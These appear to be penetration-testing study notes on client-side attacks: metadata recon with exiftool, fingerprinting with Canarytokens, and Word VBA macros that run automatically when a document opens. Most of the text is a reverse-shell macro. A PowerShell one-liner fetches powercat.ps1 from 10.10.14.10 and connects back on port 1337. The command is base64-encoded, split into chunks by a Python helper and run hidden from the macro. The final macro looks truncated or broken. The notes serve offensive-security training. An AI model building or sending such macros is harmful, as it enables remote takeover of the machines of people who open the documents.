Client-side Attacks

exiftool -a -u quote.pdf

Passive recon viewing metadata of publicly available documents to view potential installed software on the target machine

Use Canary Tokens to fingerprint the remote machine

Know. Before it mattersCanarytokens

Macros in Word documents

Save as .doc (Word 97-2003 Document)

Open powershell

Sub AutoOpen()
    Mal
End Sub
Sub Document_Open()
    Mal
End Sub
Sub Mal()
    CreateObject("Wscript.Shell").Run "powershell"
End Sub

Reverse shell macro

Encode in base64

echo "IEX(New-Object System.Net.WebClient).DownloadString('http://10.10.14.10/powercat.ps1');powercat -c 10.10.14.10 -p 1337 -e powershell" | base64

Python script to break ouput into smaller chunks

str = "powershell.exe -nop -w hidden -e <base64 output>"
n = 50
for i in range(0, len(str), n):
print("Str = Str + " + '"' + str[i:i+n] + '"')

Final Macro script

Sub AutoOpen()
    MyMacro
End Sub
Sub Document_Open()
    MyMacro
End Sub
Sub MyMacro()
    Dim Str As String
    Str = Str + "powershell.exe -nop -w hidden -enc SQBFAFgAKABOAGU"
    Str = Str + "AdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAd"
    Str = Str + "AAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwB"
    Str = Str + "QBjACAAMQA5ADIALgAxADYAOAAuADEAMQA4AC4AMgAgAC0AcAA"
    Str = Str + "gADQANAA0ADQAIAAtAGUAIABwAG8AdwBlAHIAcwBoAGUAbABsA"
    Str = Str + "A== "
CreateObject("Wscript.Shell").Run St